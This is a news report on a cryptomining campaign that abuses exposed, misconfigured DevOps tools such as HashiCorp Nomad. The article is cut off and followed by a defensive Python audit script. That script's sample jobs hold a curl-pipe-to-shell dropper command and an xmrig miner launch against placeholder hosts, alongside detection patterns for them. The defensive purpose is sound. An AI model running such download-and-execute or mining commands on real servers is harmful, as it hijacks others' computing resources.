Illicit crypto-miners pouncing on lazy DevOps configs leaving clouds vulnerable

https://news.ycombinator.com/rss Hits: 4
Summary

Up to a quarter of all cloud users are at risk of having their computing resources stolen and used to illicitly mine for cryptocurrency, after crims cooked up a campaign that targets publicly accessible DevOps tools.

Wiz Threat Research spotted the campaign and attributed it to an attacker it named JINX-0132, which it says exploits misconfigurations and vulnerabilities in multiple applications to deploy mining software. JINX-0132 targets a "wide range" of DevOps tools, but Wiz thinks it prefers HashiCorp's Nomad and Consul tools, plus Docker API and Gitea.

According to threat researchers Gili Tikochinski, Danielle Aminov and Merav Bar, Wiz data indicates that 25 percent of all cloud environments are running at least one of these technologies, and more than 20 percent run HashiCorp Consul. We've asked the Wiz kids how many instances of those applications JINX-0132 hit and will update this story when we hear back from the soon-to-be-Google-owned security shop.

"Of those environments using these DevOps tools, five percent expose them directly to the Internet, and among those exposed deployments, 30 percent are misconfigured," the team wrote.

Here's a look at the four under-fire tools, and the flaws in each that Wiz says JINX-0132 is looking to abuse.

HashiCorp Nomad

Nomad is a scheduler and orchestrator used to deploy containers and applications across multiple platforms. According to HashiCorp's documentation, Nomad is not secure by default. For example, default settings in the software's job queue feature, which schedules and manages jobs, allow any user with access to the Nomad server API to create and run such jobs. HashiCorp suggests users take several steps to address that.

Therein lies the problem, according to Wiz, because JINX-0132 found a publicly exposed Nomad server – Shodan scans can find 405 of them – running out-of-the-box settings without security features enabled. JINX-0132 used that insecure server to download and run XMRig miner software.
To ensure t...
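The Nomad exposure described above, turned into a check a defender can run against their own servers. This is an added example written for this page; it is not code from the article, from Wiz or from HashiCorp. It assumes only Nomad's default API port (4646) and the shape of its HTTP API (an anonymous GET /v1/jobs succeeds with 200 when ACLs are disabled and is refused with 403 when they are enforcing; GET /v1/job/<id> returns the full job in JSON with TaskGroups, Tasks and a per-task Config). The probe callable, the "download and run" heuristics, the sample jobs and the 203.0.113.x addresses are all constructed for the example. The fix HashiCorp documents is to set acl { enabled = true } in every agent's configuration and run nomad acl bootstrap, after which the anonymous probe below gets a 403 instead of the job list.

```python
import re
from typing import Any, Callable, Dict, List, Tuple

# Nomad serves its HTTP API on port 4646 by default. With ACLs disabled (the
# out-of-the-box state), an anonymous GET /v1/jobs returns HTTP 200 and the
# job list; with ACLs enforcing it returns 403 unless a valid token is sent.
NOMAD_API_PORT = 4646

# Heuristics for a "fetch a script and run it" or miner-launch task. These are
# illustrative patterns written for this example, not a published signature.
SUSPICIOUS_PATTERNS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("xmrig", re.compile(r"xmrig", re.IGNORECASE)),
    ("stratum-pool", re.compile(r"stratum\+(tcp|ssl)://", re.IGNORECASE)),
]


def anonymous_access_allowed(status: int) -> bool:
    """True when an unauthenticated /v1/jobs request succeeded, i.e. ACLs are off."""
    return status == 200


def task_command_line(task: dict) -> str:
    """Flatten the parts of a task Config that carry a command: exec/raw_exec
    use command + args, docker uses image + command/entrypoint/args."""
    cfg = task.get("Config") or {}
    parts = [cfg.get("image", ""), cfg.get("command", "")]
    parts += cfg.get("entrypoint") or []
    parts += cfg.get("args") or []
    return " ".join(str(p) for p in parts if p)


def flag_job(job: dict) -> List[Tuple[str, str]]:
    """Return (task name, reason) for every task in a Nomad job (API JSON form)
    whose command line matches one of the heuristics above."""
    findings = []
    for group in job.get("TaskGroups") or []:
        for task in group.get("Tasks") or []:
            line = task_command_line(task)
            for reason, pattern in SUSPICIOUS_PATTERNS:
                if pattern.search(line):
                    findings.append((task.get("Name", "?"), reason))
                    break
    return findings


def audit(probe: Callable[[str], Tuple[int, Any]]) -> Dict[str, Any]:
    """Run both checks against one server. probe(path) performs the anonymous
    GET and returns (status, decoded JSON body). It is injected so the example
    runs offline; against a real host it would wrap urllib.request for
    http://<host>:4646<path> with no X-Nomad-Token header."""
    status, jobs = probe("/v1/jobs")
    report: Dict[str, Any] = {"anonymous_api": anonymous_access_allowed(status),
                              "suspicious_jobs": []}
    if not report["anonymous_api"]:
        return report  # jobs are unreadable without a token: ACLs are doing their job
    for stub in jobs:
        _, job = probe(f"/v1/job/{stub['ID']}")
        for task, reason in flag_job(job):
            report["suspicious_jobs"].append((stub["ID"], task, reason))
    return report


# Constructed sample data standing in for an exposed server's responses.
# 203.0.113.0/24 is the TEST-NET-3 documentation range, not a real host.
SAMPLE_JOBS = {
    "web": {"ID": "web", "TaskGroups": [{"Name": "web", "Tasks": [
        {"Name": "nginx", "Driver": "docker",
         "Config": {"image": "nginx:1.27", "ports": ["http"]}}]}]},
    "xmr-worker": {"ID": "xmr-worker", "TaskGroups": [{"Name": "w", "Tasks": [
        {"Name": "dropper", "Driver": "raw_exec",
         "Config": {"command": "/bin/sh",
                    "args": ["-c", "curl -fsSL http://203.0.113.10/x.sh | sh"]}}]}]},
    "cpu-bench": {"ID": "cpu-bench", "TaskGroups": [{"Name": "b", "Tasks": [
        {"Name": "miner", "Driver": "docker",
         "Config": {"image": "alpine:3.20", "command": "xmrig",
                    "args": ["-o", "stratum+tcp://203.0.113.20:3333"]}}]}]},
}


def exposed_server(path: str) -> Tuple[int, Any]:
    """Fake probe: behaves like a Nomad server with ACLs disabled."""
    if path == "/v1/jobs":
        return 200, [{"ID": jid} for jid in SAMPLE_JOBS]
    return 200, SAMPLE_JOBS[path.rsplit("/", 1)[1]]


def locked_down_server(path: str) -> Tuple[int, Any]:
    """Fake probe: ACLs enabled, anonymous requests are refused."""
    return 403, {"error": "Permission denied"}


if __name__ == "__main__":
    print(audit(exposed_server))      # anonymous_api True, two flagged jobs
    print(audit(locked_down_server))  # anonymous_api False, nothing readable
```

The heuristics deliberately stop at the first match per task so a single dropper is reported once; a real deployment would feed the flagged job IDs to nomad job stop and then inspect the node that ran them, since a miner that has already been scheduled keeps running after the API is locked down.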

First seen: 2025-06-03 12:41

Last seen: 2025-06-03 15:41